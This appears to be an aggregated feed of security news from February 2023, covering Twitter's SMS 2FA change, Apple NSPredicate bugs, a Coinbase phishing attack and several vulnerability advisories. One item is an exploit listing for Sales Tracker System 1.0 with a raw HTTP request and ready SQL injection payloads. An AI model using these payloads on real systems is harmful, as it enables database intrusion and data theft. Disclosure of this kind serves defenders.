Latest threat prevention module helps resource-strapped security teams block unsafe, untrusted or vulnerable applications.

**SANTA CLARA, Calif.****,** **Feb. 21, 2023** **/PRNewswire/ --** Malwarebytes™, a global leader in real-time cyberprotection, today announced the addition of Malwarebytes Application Block to its Nebula and OneView endpoint protection platforms. The new threat prevention module helps resource-strained security teams quickly guard against unsafe third-party Windows applications, meet key compliance requirements and encourage productivity without adding management complexity. 

Third-party apps pose a serious security threat to businesses with limited IT resources and expertise. Vulnerabilities in Android applications have led to more than one million malicious application downloads, with researchers frequently uncovering malware-ridden applications on Google Play. Since 63% of workers use unauthorized applications, businesses of all sizes can be vulnerable to phishing schemes or exploitation – two of the four leading ways attackers gain access to a company's network.1

For the over 1.4 billion monthly active Windows 10 or Windows 11 devices2, Application Block allows IT admins to blacklist or restrict access to outdated, untrusted, or unsafe applications with known vulnerabilities or that lack the latest patches. IT security teams can use Application Block's dashboard to understand what applications are being blocked in real-time, as well as its reporting features to meet key compliance requirements and navigate increasing data protection regulations.

"Third-party applications are essential to productivity, but they also greatly expand organizations' attack surfaces," said Malwarebytes Chief Product Officer, Mark Strassman. "Malwarebytes Application Block can be near-instantly deployed, helping resource-strapped organizations to effectively manage secure access to third-party apps and add another protective layer without added complexity."

Malwarebytes Application Block is immediately available for Windows endpoints within the Malwarebytes Nebula and OneView platforms to help organizations:

*   **Improve Application Security** – Stop the execution of vulnerable applications so that companies can test and apply updates or block the vulnerable application until a patch is available.
*   **Encourage Employee Productivity** – Restrict access to non-business-related applications, maximizing efficiency and saving resources.
*   **Satisfy Compliance Regulations** – Reduce the risk of failing to comply with data protection regulations such as GDPR, CIPA or HIPAA.

To read more about the latest threats and cyber protection strategies, visit our newsroom, or follow us on Facebook, Instagram, LinkedIn, TikTok and Twitter.

**About Malwarebytes**

Malwarebytes believes that when people and organizations are free from threats, they are free to thrive. Founded in 2008, Malwarebytes CEO Marcin Kleczynski had one mission: to rid the world of malware. Today, Malwarebytes' award-winning endpoint protection, privacy and threat prevention solutions and its world-class team of threat researchers protect millions of individuals and thousands of businesses across the globe. The effectiveness and ease-of-use of Malwarebytes solutions are consistently recognized by independent third parties including MITRE Engenuity, MRG Effitas, AVLAB, AV-TEST (consumer and business), Gartner Peer Insights, G2 Crowd and CNET. The company is headquartered in California with offices in Europe and Asia. For more information and career opportunities, visit https://www.malwarebytes.com.

Malwarebytes Expands Platform With New Application Block Capabilities

Making the option available only to paid subscribers — while also claiming SMS authentication is broken — doesn't make sense, some say. Is it a cash grab?

Twitter's sudden decision to disable SMS-based two-factor authentication (2FA) for all users except subscribers of its paid Twitter Blue service has infuriated security experts and further tarnished the social media giant's already somewhat dubious reputation for protecting users of its services.

Twitter, on Feb. 15, announced that in 30 days it would disable text-message based — or SMS-based — 2FA for all but paying Twitter Blue subscribers. "After 20 March 2023, we will no longer permit non-Twitter Blue subscribers to use text messages as a 2FA method," the company said. "At that time, accounts with text message 2FA still enabled will have it disabled."

Several analysts view the move as ill-conceived and weakening protections for the millions of users that currently use the two-factor option when accessing their Twitter accounts. Even those who agree with Twitter's view about text message-based authentication mechanisms being somewhat susceptible to attack still perceive it as offering magnitudes more protection than not having a second factor at all.

**Twitter's Ill-Conceived Move**

"The optics are certainly bad," says Richard Stiennon, chief research analyst at IT-Harvest. "This move seems to put a price on better security for Twitter which is the poster child for account takeover attacks dating back to 2008 when a script kiddie in California ran John the Ripper against celebrity accounts to guess their passwords."

The company urged users that still want to enable 2FA for their Twitter accounts to consider using an authentication app or security key/token as their second factor. Authentication apps are mobile apps that generate a one-time password or key that users can use in addition to their password when accessing an account on which they have enabled two-factor authentication. Examples include Google Authenticator, Microsoft Authenticator, and LastPass Authenticator. 

Security keys are usually a physical device — like a USB dongle — that users can use to verify their identity when logging in to an account. "These methods require you to have physical possession of the authentication method and are a great way to ensure your account is secure," Twitter said.

"Using an authenticator app is better \[than text-based 2FA\]," Steinnon notes, "but there will never be a large number of users unless Twitter makes such an app a requirement and makes it available for free."

**Raising Questions About Text-Based 2FA**

The social media company's brief statement announcing its decision to stop SMS authentication alluded to concerns over the security of the process as the main motivation: "While historically a popular form of 2FA, unfortunately we have seen phone-number based 2FA be used — and abused — by bad actors."

The widespread use of mobile devices for SMS-based 2FA authentication, for instance, has driven an increase in so called SIM-swapping attacks, where a threat actor transfers another individual's phone number to their SIM card so they can intercept the SMS authentication messages used for 2FA. Concerns over weaknesses in mobile networks allowing attackers to intercept SMS messages and use it to break into 2FA protected accounts have persisted for years, as have calls to replace it with stronger token and app based token generators.

Nonetheless, Stiennon and others dismiss that explanation as not being enough reason to disable the option for anyone that wants to use it. "For highly targeted attacks, it is true that SMS can be intercepted by determined attackers," he says, noting that such attacks are rare.

**An Attempt to Raise Revenue?**

John Pescatore, director of emerging security trends at the SANS Institute, says Twitter's move is somewhat akin to a bank insisting that users of a free checking account only enter their PIN — and not their ATM card as well — to use an ATM machine. "While SMS messaging as 2FA is less secure than tokens, trusted apps, or other phishing-resistant forms, it is still so much more secure than reusable passwords," he says.

"The only justification for what they are doing is an attempt to raise revenue," Pesactore tells Dark Reading. Otherwise, why would they allow a supposedly less secure authentication only be available to their paid subscribers, he points out.

A transparency report that Twitter released in December 2021 showed at that time that some 2.4% of active Twitter accounts had enabled 2FA. Of that, 74.4% used SMS authentication, 28.9% used an authentication app, and 0.5% had a security key. Based on those numbers (the most recent), only a relatively small proportion of Twitter's active accounts would appear directly impacted by Twitter's recent decision — though, of course, adoption could have increased since 2021. Still, some see it as another indication of what they perceive as Twitter's cavalier attitude toward user security. Earlier this year, after all, an apparent API endpoint compromise at Twitter allowed an attacker to steal data on some 200 million Twitter users and put it up for sale on an underground forum.

"Twitter has a consistently poor record around security," Pescatore notes. Last year, for instance, the Federal Trade Commission assessed a $150 million civil penalty over the company not taking steps required of them to fix problems that caused privacy violations dating back years, he says. Those violations had to do with Twitter using phone numbers and email addresses that it collects for 2FA to deliver targeted advertising instead. 

"Under new ownership, this year they first tried to increase revenue by giving verified identity status to anyone willing to pay $8," Pescatore adds.

**Coming Under the Microscope**

As if the company's security challenges were not bad enough, Elon Musk's controversial leadership of Twitter has also put the company's every move under the microscope.

"As with anything to do with Twitter nowadays, the broader context for their decisions invites a lot of controversy from all over the political spectrum," says Fernando Montenegro, an analyst with Omdia.

With the latest move, there's a general understanding that SMS 2FA is less resistant to some attacks than the authenticator apps or security keys. So getting users to move towards "better" MFA is a good thing for potentially improving resilience against these attacks, he adds. "It's also a decision that saves Twitter money, as they will no longer be sending MFA SMS messages to accounts that are not subscribers," Montenegro says.

The key question here is whether people use SMS because it's easier to set it up or just because they don't know about alternatives, he points out. "If the former, and Twitter doesn't make the process easier, then security is likely to suffer. If the latter, then their decision can actually result in more people knowing about other options for MFA and turning those on."

Analysts Slam Twitter's Decision to Disable SMS-Based 2FA

Sales Tracker System version 1.0 suffers from an authenticated remote SQL injection vulnerability.

    # Exploit Title: Authenticated SQL Injection on Sales Tracker System# Google Dork: NA# Date: 21/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage:https://www.sourcecodester.com/php/16061/sales-tracker-management-system-using-php-free-source-code.html# Software Link: [download link if available]# Version: 1.0# Tested on: Windows 11```GET /php-sts/admin/products/view_product.php?id=5' HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/110.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestConnection: closeReferer: http://localhost/php-sts/admin/?page=productsCookie: PHPSESSID=tcc4d9ffr86hm2dqlfmos7amhgSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin```# PayloadParameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: id=5' AND 3888=3888-- vxtB    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: id=5' OR (SELECT 7013 FROM(SELECTCOUNT(*),CONCAT(0x7162767671,(SELECT(ELT(7013=7013,1))),0x7170717671,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ikkJ    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=5' AND (SELECT 2482 FROM (SELECT(SLEEP(5)))dHEy)-- ehsZ---[15:47:48] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.4.54, PHP 8.0.25back-end DBMS: MySQL >= 5.0 (MariaDB fork)

Sales Tracker System 1.0 SQL Injection

Security researchers found a class of flaws that, if exploited, would allow an attacker to access people’s messages, photos, and call history.

For years, Apple has hardened the security systems on iPhones and Macs. But no company is immune from such issues. Research reveals a new class of bugs that can affect Apple’s iPhone and Mac operating systems and if exploited could allow an attacker to sweep up your messages, photos, and call history.

Researchers from security firm Trellix’s Advanced Research Center are today publishing details of a bug that could allow criminal hackers to break out of Apple’s security protections and run their own unauthorized code. The team says the security flaws they found—which they rank as medium to high severity—bypass protections Apple had put in place to protect users.

“The key thing here is the vulnerabilities break Apple’s security model at a fundamental level,” says Doug McKee, director of vulnerability research at Trellix. McKee says that finding the new bug class means researchers and Apple will potentially be able to find more similar bugs and improve overall security protections. Apple has fixed the bugs the company found, and there is no evidence they were exploited.

Trellix’s findings build on previous work by Google and Citizen Lab, a University of Toronto research facility. In 2021, the two organizations discovered ForcedEntry, a zero-click, zero-day iOS exploit that was linked to Israeli spyware maker NSO Group. (The exploit, described as highly sophisticated, was found on the iPhone of a Saudi activist and used to install NSO’s Pegasus malware.)

Analysis of ForcedEntry showed it involved two key parts. The first tricked an iPhone into opening a malicious PDF that was disguised as a GIF. The second part allowed attackers to escape Apple’s sandbox, which keeps apps from accessing data stored by other apps and from accessing other parts of the device. Trellix’s research, by senior vulnerability researcher Austin Emmitt, focuses on that second part and ultimately used the flaws he found to bypass the sandbox.

Specifically, Emmitt found a class of vulnerabilities that revolve around NSPredicate, a tool that can filter code within Apple’s systems. NSPredicate was first abused in ForcedEntry, and as a result of that research in 2021, Apple introduced new ways to stop the abuse. However, those don’t appear to have been enough. “We discovered that these new mitigations could be bypassed,” Trellix says in a blog post outlining the details of its research.

McKee explains that the bugs within this new NSPredicate class existed in multiple places across macOS and iOS, including within Springboard, the app that manages the iPhone’s home screen and can access location data, photos, and the camera. Once the bugs are exploited, the attacker can access areas that are meant to be closed off. A proof-of-concept video published by Trellix shows how the vulnerabilities can be exploited. 

The new class of bugs “brings a lens to an area that people haven’t been researching before because they didn’t know it existed,” McKee says. “Especially with that backdrop of ForcedEntry because somebody at that sophistication level already was leveraging a bug in this class.”

Crucially, any attacker trying to exploit these bugs would require an initial foothold into someone’s device. They would need to have found a way in before being able to abuse the NSPredicate system. (The existence of a vulnerability doesn’t mean that it has been exploited.)

Apple patched the NSPredicate vulnerabilities Trellix found in its macOS 13.2 and iOS 16.3 software updates, which were released in January. Apple has also issued CVEs for the vulnerabilities that were discovered: CVE-2023-23530 and CVE-2023-23531. Since Apple addressed these vulnerabilities, it has also released newer versions of macOS and iOS. These included security fixes for a bug that was being exploited on people’s devices. Make sure you update your iPhone, iPad, and Mac each time a new version of the operating system becomes available.

A New Kind of Bug Spells Trouble for iOS and macOS Security

Popular cryptocurrency exchange platform Coinbase disclosed that it experienced a cybersecurity attack that targeted its employees.
The company said its "cyber controls prevented the attacker from gaining direct system access and prevented any loss of funds or compromise of customer information."
The incident, which took place on February 5, 2023, resulted in the exposure of a "limited amount of

Social Engineering / Cryptocurrency

Popular cryptocurrency exchange platform Coinbase disclosed that it experienced a cybersecurity attack that targeted its employees.

The company said its "cyber controls prevented the attacker from gaining direct system access and prevented any loss of funds or compromise of customer information."

The incident, which took place on February 5, 2023, resulted in the exposure of a "limited amount of data" from its directory, including employee names, e-mail addresses, and some phone numbers.

As part of the attack, several employees were targeted in an SMS phishing campaign urging them to sign in to their company accounts to read an important message.

One employee is said to have fallen for the scam, who entered their username and password in a fake login page set up by the threat actors to harvest the credentials.

"After 'logging in,' the employee is prompted to disregard the message and thanked for complying," the company said. "What happened next was that the attacker \[...\] made repeated attempts to gain remote access to Coinbase."

These attempts to log in to the systems using the captured credentials proved to be unsuccessful owing to the multi-factor authentication protections that were enabled for the account.

Undeterred, the threat actor called the employee claiming to be from the Coinbase corporate Information Technology (IT) team and directed the individual to log into their workstation and follow a set of instructions.

"That began a back and forth between the attacker and an increasingly suspicious employee," Coinbase explained. "As the conversation progressed, the requests got more and more suspicious."

The company said it was alerted within the first 10 minutes of the attack and that its incident responders reached out to the victim to inquire about the suspicious activity from their account, prompting the person to sever all communications with the adversary.

Coinbase did not elaborate on the exact instructions the threat actor gave to the employee, but urged other companies to be on the lookout for potential attempts to install remote desktop software such as AnyDesk or ISL Online as well as a legitimate Google Chrome extension called EditThisCookie.

It also warned of incoming phone calls and text messages from specific providers like Google Voice, Skype, Vonage/Nexmo, and Bandwidth.

Coinbase further noted that the attack is likely linked to the sophisticated phishing campaign known as 0ktapus (aka Scatter Swine) that targeted over 130 companies, including Twilio, Cloudflare, MailChimp, and Signal, among others, last year.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Coinbase Employee Falls for SMS Scam in Cyber Attack, Limited Data Exposed

The WP Private Message WordPress plugin (bundled with the Superio theme as a required plugin) before 1.0.6 does not ensure that private messages to be accessed belong to the user making the requests. This allowing any authenticated users to access private messages belonging to other users by tampering the ID.

Superio – Job Board WordPress theme is a complete Job Board WordPress theme that allows you to create a useful and easy to use job listings website. Using Superio theme, you can create a complete & fully Responsive job portal, career platform to run human resource management, recruitment or job posting website. Superio is not just a job board theme, it’s the best WordPress job portal template choice for anyone who wants a simple job script that makes money.

**Features**

*   Fields Manager
*   Indeed Jobs Import
*   Career builder Jobs Import
*   Careerjet Jobs Import
*   Ziprecruiter Jobs Import
*   **Restrict Job**  
    **\- View job page:**
    *   All (Users, Guests)
    *   All Register Users
    *   Register Candidates (All registered candidates can view jobs.)
    *   Always Hidden
*   **Restrict Candidate**  
    **\- View candidate page:**
    
    *   All (Users, Guests)
    *   All Register Users
    *   Only Applicants (Employer can view only their own applicants candidates.)
    *   Register Employers (All registered employers can view candidates.)
    *   Register Employers with package (Registered employers who purchased CV Package can view candidates.)
    
    **\- View candidate contact info:**
    *   All (Users, Guests)
    *   All Register Users
    *   Only Applicants (Employer can view only their own applicants candidates.)
    *   Register Employers (All registered employers can view candidates.)
    *   All users can view candidate, but only employers with package can see contact info (Users who purchased Contact Package can see contact info.)
*   **Restrict Employer**  
    **\- View candidate page:**
    
    *   All (Users, Guests)
    *   All Register Users
    *   Only Applicants (Candidate can view only their own applicants employers.)
    *   Register Candidates (All registered candidates can view employers.)
    *   Always Hidden
    
    **\- View candidate contact info:**
    *   All (Users, Guests)
    *   All Register Users
    *   Only Applicants (Candidate can view only their own applicants employers.)
    *   Register Candidates (All registered candidates can view employers.)
    *   Always Hidden
*   Add a job in frontend
*   Highly Customizable
*   Extensive Admin Interface
*   One click Demo Import
*   No coding knowledge required
*   Page Templates
*   Responsive & Retina Ready
*   Large collection of useful inner pages
*   Choose your grid size
*   Boxed layout option
*   Powerful typography options
*   Translation ready
*   WooCommerce compatible
*   Powerful sorting options for job listings and resumes
*   Multiple ways of showcasing job listings and resumes
*   Listing List shortcode
*   Listing Search shortcode
*   Listing Advanced Search shortcode
*   Listing Simple Search shortcode
*   Resume List shortcode
*   Resume Advanced Search shortcode
*   User login
*   User Dashboard page template
*   Facebook, Google, Twitter, LinkedIn login
*   Facebook, Google, Twitter, LinkedIn apply job
*   Pricing Tables shortcode
*   Comparison Pricing Tables shortcode
*   Smooth Page Transitions
*   Fontawsome & Flaticon
*   User Login Form
*   User Notification
*   Meeting Zoom
*   Here maps
*   Google maps
*   Mapbox maps

**Updates History:**

**Version 1.2.37 – 13 February 2023**

\* Updated preview job
\* Updated apply job
\* Updated reviews
\* Fixed datepicker in register form

**Version 1.2.36 – 07 January 2023**

\* Updated WooCommerce
\* Updated upload file
\* Update apply job
\* Updated RSS job

**Version 1.2.35 – 19 December 2022**

\* Updated WooCommerce
\* Updated Download CV
\* Updated Filter
\* Updated PHP warning

**Version 1.2.34 – 29 November 2022**

\* Updated job apply
\* Fixed error application when deleting candidate, job

**Version 1.2.33 – 11 November 2022**

\* Fixed apply for a job

**Version 1.2.32 – 07 November 2022**

\* Updated WooCommerce
\* Updated meeting form
\* Updated register form
\* Updated message in email template
\* Added notifications in header mobile
\* Fixed scheduled meeting

**Version 1.2.31 – 19 October 2022**

\* Update candidate filter tag
\* Update filter custom date field
\* Updated experience field
\* Updated cancel package
\* Updated private message

**Version 1.2.30 – 20 September 2022**

\* Updated WooCommerce
\* Updated candidate tag default

**Version 1.2.29 – 13 September 2022**

\* Updated packages
\* Updated upload file

**Version 1.2.28 – 25 August 2022**

\* Updated theme style
\* Updated calendar
\* Updated Notification
\* Updated currency

**Version 1.2.27 – 04 August 2022**

\* Updated email template
\* Updated Fields Manager

**Version 1.2.26 – 26 July 2022**

\* Updated pricing page
\* Updated application deadline
\* Updated thanks email content

**Version 1.2.25 – 20 July 2022**

\* Updated required custom field
\* Updated google job structure data
\* Updated application deadline

**Version 1.2.24 – 11 July 2022**

\* Updated job RSS feed
\* Added thanks email after applied job
\* Updated notification
\* Updated elementor element
\* Updated restrict candidate contact form

**Version 1.2.23 – 28 June 2022**

\* Updated shortlist candidate name
\* Fixed remove emloyee

**Version 1.2.22 – 13 June 2022**

\* Updated related jobs
\* Updated job map logo
\* Added telegram, discord social network

**Version 1.2.21 – 04 June 2022**

\* Updated multiple select field
\* Updated Apus Posts element
\* Updated register password
\* Updated plugin settings

**Version 1.2.20 – 18 May 2022**

\* Updated Theme Font
\* Updated widgets
\* Updated employer url
\* Updated socials link
\* Updated user description

**Version 1.2.19 – 09 May 2022**

\* Fixed Login user
\* Updated meeting zoom email varibales

**Version 1.2.18 – 04 May 2022**

\* Updated filter custom fields multiple select
\* Updated datepicker
\* Updated meeting date
\* Added restrict Employer, Candidate fields
\* Updated register form

**Version 1.2.17 – 03 May 2022**

\* Fixed employer url

**Version 1.2.16 – 29 April 2022**

\* Updated breadcrumbs url
\* Added filled label
\* Improved Apus Team element
\* Fixed create meetings in Approved tab

**Version 1.2.15 – 27 April 2022**

\* Updated date format
\* Updated filter custom field
\* Added option for Job Slug, Employer slug, Candidate slug
\* Update import employer, candidate
\* Added recapthcha login
\* Add hidden Job title, Candidate title, Employer title
\* Updated show/hide password in login/change password form
\* Updated location display

**Version 1.2.14 – 21 April 2022**

\* Updated employer job count
\* Updated employer url
\* Updated cache taxonomy
\* Updated date format
\* Updated invite email variables
\* Updated register password
\* Updated send email contact subject
\* Fixed upload file
\* Fixed upload cv apply

**Version 1.2.13 – 04 April 2022**

\* Updated theme style
\* Updated mobile menu label
\* Updated register candidate, register employer
\* Updated RSS feed
\* Updated submit job package

**Version 1.2.12 – 24 March 2022**

\* Updated Elementor
\* Updated Application Dealine

**Version 1.2.11 – 22 March 2022**

\* Updated WooCommerce login/register
\* Added Job Expired, Candidate Expired page
\* Updated shortlist job
\* Updated shortlist candidate
\* Updated candidate filter form
\* Updated employer filter form

**Version 1.2.10 – 10 March 2022**

\* Fixed Employer dashboard
\* Fixed jobs applications

**Version 1.2.9 – 03 March 2022**

\* Updated related Job
\* Updated Related Candidate
\* Updated Register Employer, Candidate
\* Updated apply without login

**Version 1.2.8 – 24 February 2022**

\* Updated jobs category
\* Updated Logout User
\* Updated import employer, candidate

**Version 1.2.7 – 10 February 2022**

\* Update footer menu style
\* Update language

**Version 1.2.6 – 20 January 2022**

\* Updated Jobs page url, Candidates page url, Employer page url
\* Updated candidate download his resume
\* Updated meetings message
\* Fixed filter taxonomy page

**Version 1.2.5 – 17 January 2022**

\* Add Register Tabs
\* Fixed create Employee
\* Fixed invite candidate

**Version 1.2.4 – 12 January 2022**

\* Updated Resume builder
\* Fixed invite candidate apply job

**Version 1.2.3 – 11 January 2022**

\* Fixed PHP error
\* Updated Invited Candidate
\* Added Autocomplete search

**Version 1.2.2 – 05 January 2022**

\* Updated logo thumbnail
\* Updated multiple languages
\* Updated Rest API

**Version 1.2.1 – 20 December 2021**

\* Updated Apus Posts element
\* Updated filter button
\* Updated taxonomy select2
\* Updated candidate profile
\* Updated job alert
\* Updated candidate alert

**Version 1.2.0 – 07 December 2021**

\* Added more 7 Home pages
\* Added Phone field for Job
\* Added select search taxonomy
\* Added Invite Candidate Apply Job
\* Add multi currencies
\* Updated recaptcha
\* Updated breadcrumbs
\* Improved filled job

**Version 1.1.16 – 16 November 2021**

\* Added Call to Apply
\* Updated Employer Dashboard
\* Fixed candidate category banner
\* Fixed user packages

**Version 1.1.15 – 05 November 2021**

\* Fixed WPML
\* Updated Google Struct Data
\* Updated Job Alert, Candidate Alert

**Version 1.1.14 – 15 October 2021**

\* Updated apply CV
\* Updated contact email
\* Updated WPML
\* Updated salary filter

**Version 1.1.13 – 15 October 2021**

\* Updated megamenu fullwidth
\* Updated My Jobs page
\* Updated Job EMployer Info
\* Add option enable/disable Upload CV in Apply form
\* Fixed Resume PDF
\* Updated salary slider
\* Add show/hide Employer profile
\* Update upload filte types

**Version 1.1.12 – 29 September 2021**

\* Updated experience date
\* Updated packages sort
\* Updated social login
\* Updated submit job slug
\* Improved salary display
\* Improved job filled

**Version 1.1.11 – 16 September 2021**

\* Fixed Employee user
\* Fixed job applications
\* Fixed restrict candidates
\* Updated filter job, employer, candidate
\* Updated candidate salary
\* Updated resume creation pdf
\* Updated user password
\* Updated Employer categories
\* Updated header mobile options

**Version 1.1.10 – 09 September 2021**

\* Fixed private message
\* Fixed load more jobs, candidates, employers
\* Fixed maps
\* Fix price currency
\* Fixed job alert
\* Fixed register form
\* Updated user short profile
\* Updated locations
\* Updated candidate shortlist
\* Updated custom fields
\* Updated translate

**Version 1.1.9 – 24 August 2021**

\* Updated Pagination Load More
\* Updated Apply Types Field
\* Added option to change background color for Urgent, Featured items

**Version 1.1.8 – 23 August 2021**

\* Updated region field
\* Updated upload file
\* Fixed price currency
\* Updated breadcrumbs
\* Updated locations
\* Updated pagination

**Version 1.1.7 – 12 August 2021**

\* Updated Employer dashboard
\* Updated filter jobs, candidates, employers
\* Added show full phone
\* Added options show header desktop in mobile

**Version 1.1.6 – 05 August 2021**

\* Added Notifications for Employer, Candidate Dashboard
\* Updated string translate
\* Updated Restrict Candidate, Employer 
\* Updated region orderby

**Version 1.1.5 – 30 July 2021**

\* Fixed User packages
\* Added tags field for Candidate
\* Updated Candidate single page
\* Updated settings page

**Version 1.1.4 – 22 July 2021**

\* Added job logo field

**Version 1.1.3 – 20 July 2021**

\* Added Apply job without login
\* Added Required Label
\* Updated upload file

**Version 1.1.2 – 13 July 2021**

\* Updated pricing packages
\* Updated my jobs page
\* Updated job applied status
\* Updated candidate dashboard
\* Updated header mobile

**Version 1.1.1 – 08 July 2021**

\* Updated User Profile
\* Updated package
\* Updated Register form
\* Updated Employer dashboard chart

**Version 1.1.0 – 01 July 2021**

\* Added Meeting Zoom
\* Added Notification
\* Added register from settings
\* Added Here Maps
\* Fixed private message
\* Update filter form

**Version 1.0.13 – 16 June 2021**

\* Added show job field by package
\* Added show more button for taxonomy checklist, radio
\* Fixed CV file url
\* Fixed candidate dashboard
\* Updated theme style

**Version 1.0.12 – 15 June 2021**

\* Added dashboard chart
\* Updated filter
\* Updated login/register form
\* Updated font icon for custom field
\* Fixed number item per page
\* Improved style for no breadcrumbs

**Version 1.0.11 – 11 June 2021**

\* Updated Job, Candidate, Employer video
\* Updated Jobs, employers, candidates page with no breadcrumbs

**Version 1.0.10 – 10 June 2021**

\* Update select2 javascript

**Version 1.0.9 – 08 June 2021**

\* Update theme style
\* Fixed job maps in job preview

**Version 1.0.8 – 05 June 2021**

\* Update job application

**Version 1.0.7 – 29 May 2021**

\* Update responsive
\* Updated search jobs form
\* Updated job email apply

**Version 1.0.6 – 27 May 2021**

\* Update fields
\* Updated filter job
\* Fixed submit job

**Version 1.0.5 – 25 May 2021**

\* Updated theme style
\* Updated custom field display
\* Updated apply job
\* Fixed edit job

**Version 1.0.4 – 25 May 2021**

\* Updated theme style
\* Updated theme options
\* Improve fields manager

**Version 1.0.3 – 24 May 2021**

\* Updated register user
\* Update email template

**Version 1.0.2 – 22 May 2021**

\* Updated Import Demo Data

**Version 1.0.1 – 21 May 2021**

\* Updated Import Demo Data
\* Updated theme style

**Version 1.0.0 – 20 May 2021**

\* First release

CVE-2023-0453: Superio – Job Board WordPress Theme

Apollo is a configuration management system. Prior to version 2.1.0, a low-privileged user can create a special web page. If an authenticated portal admin visits this page, the page can silently send a request to assign new roles for that user without any confirmation from the Portal admin. Cookie SameSite strategy was set to Lax in version 2.1.0. As a workaround, avoid visiting unknown source pages.

**Impact**

A low-privileged user can create a special web page. If an authenticated portal admin visits this page, the page can silently send a request to assign new roles for that user without any confirmation from the Portal admin.

**Patches**

Cookie SameSite strategy was set to Lax in #4664 and was released in v2.1.0.

**Workarounds**

To fix the potential issue without upgrading, simply follow the advice that does not visit unknown source pages.

**References**

Apollo Security Guidence

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in issue
*   Email us at apollo-config@googlegroups.com

CVE-2023-25569: Potential csrf issue in apollo-portal

By Deeba Ahmed
Samsung Message Guard is a new feature that protects users against zero-click attacks, including those appearing from messaging apps.
This is a post from HackRead.com Read the original post: New Samsung Message Guard protects users against Zero-Click attacks

Samsung Message Guard will inspect the file bit by bit and process it in a controlled environment, thus neutralizing the threat to ensure the malicious file doesn’t infect the device.

Zero-Click attacks have become very powerful and widespread, mainly due to their ease of deployment. With the evolution of zero-click attacks, mobile phone manufacturers, such as Samsung, are also improving their defence mechanisms against such threats. Samsung Message Guard is one such step that prevents users from zero-click exploits on Samsung Galaxy S23 smartphones.

**What are Zero-Click Attacks?**

Zero-click exploits can install malware on a device using just a JPEG or PNG image file. They are pretty dangerous, as the user doesn’t need to interact with the file, such as clicking or tapping on it, to get their device infected. Users cannot detect these exploits while the malicious code steals their private data and transmits it to hackers.

As previously reported, state-sponsored cybercriminals used zero-click attacks to install NSO Group’s spyware Pegasus onto the mobile phones of dissidents, government officials, activists, politicians, and journalists.

**Samsung Message Guard Will Protect Against Zero-Click Attacks**

Samsung Galaxy smartphones are already equipped with advanced safety measures and a powerful Samsung Knox platform that thwart attacks exploiting audio and video formats. With Samsung Message Guard, the company has taken another step to safeguard its devices and restrict their exposure to malicious codes hidden in image attachments.

According to Samsung’s press release, this feature will work on Samsung Messages and Messages by Google. The company will also release an update to make this feature compatible with third-party messaging apps.

> Simply put, Samsung Message Guard automatically neutralizes any potential threat hiding in image files before they have a chance to do you any harm. It also runs silently and largely invisibly in the background and does not need to be activated by the user.
> 
> Samsung

**How Does Message Guard Prevent Zero-Click Attacks?**

You can consider it an advanced sandbox or a virtual quarantine; it will run in the background with the Messages app. As soon as any image file is received, it will be isolated from the rest of the data to prevent any hidden malicious code from accessing the device data or interacting with the OS.

Samsung Message Guard will inspect the file bit by bit and process it in a controlled environment, thus neutralizing the threat to ensure the malicious file doesn’t infect the device.

Message Guard will look for malware in PNG, JPG, JPEG, GIF, ICO, WEBP, BMP, and WBMP formats. The feature will be rolled out to different versions of Galaxy smartphones and tablets running One UI 5.1 or above versions.

New Samsung Message Guard protects users against Zero-Click attacks

Twitter is disabling SMS-based two-factor authentication. Switch to these alternatives to keep your account safe.

The latest bizarre move of Elon Musk’s Twitter ownership weakens the security of millions of accounts. On February 17, Twitter announced plans to stop people using SMS-based two-factor authentication to secure their accounts—unless they start paying for a Twitter Blue subscription. However, there are more secure, free, and easier ways to continue protecting your Twitter account with two-factor authentication.

Two-factor authentication, also known as 2FA or multi-factor authentication, is one of the most effective ways to protect your online accounts from being hacked. When logging in to a website, app, or service, 2FA requires you to sign in using your username and password, then verify that the login is authentic using another piece of information. Most commonly, this involves entering a temporary code that’s generated or sent to you in real time.

This second piece of information helps to prove that the person logging in is actually you. While billions of passwords have been compromised online, the 2FA code is often delivered to or created by the device that’s in your pocket. Having any kind of two-factor authentication turned on is better than none. However, it isn’t entirely foolproof. For years, security researchers have warned that SMS-based two-factor authentication isn’t as secure as other 2FA options.

That’s because SIM-swapping attacks, where phone numbers are compromised by attackers, let criminals access 2FA messages and break into accounts. Put simply: Using another 2FA option, even if it is slightly less convenient, is your best option.

In its announcement, Twitter said people have 30 days to turn off SMS-based 2FA and move to another option. It said the system had been abused by “bad actors” in the past. On March 20, Twitter will “disable” using text messages for two-factor authentication—unless you pay for the privilege. People have already started seeing pop-ups telling them to “remove text message two-factor authentication” before this date. 

However, Twitter’s announcement has baffled, confused, and angered security researchers. They say removing SMS-based 2FA just for people who don’t pay for Twitter Blue doesn’t make any sense and will weaken people’s security if they do not move to another 2FA option. Here’s what you should do to keep your account secure.

Use an Authenticator App or Security Key

Instead of turning 2FA off on your Twitter account, there are two better options: authenticator apps and security keys. They both work using the same principles as SMS-based 2FA. To enable either of these alternatives you will need to visit Twitter, open its **Settings and privacy**, then **Security and account access**, **Security**, and finally **Two-factor authentication**. (Or just click here if you are logged in). Here you will get the option to use two-factor authentication via an app or using security keys.

Instead of sending your six-digit authentication code via SMS message, authenticator apps are constantly generating the codes themselves and are synced with the services you use. Authenticator apps list all the websites you have registered with them and display the codes you need to enter to log in. These codes refresh every 30 seconds. Each time you need to log in to a website or app, you visit the authenticator app after entering your username and password to get the authentication code instead of waiting for a text message. (It’s particularly helpful if your phone doesn’t have connectivity for some reason.)

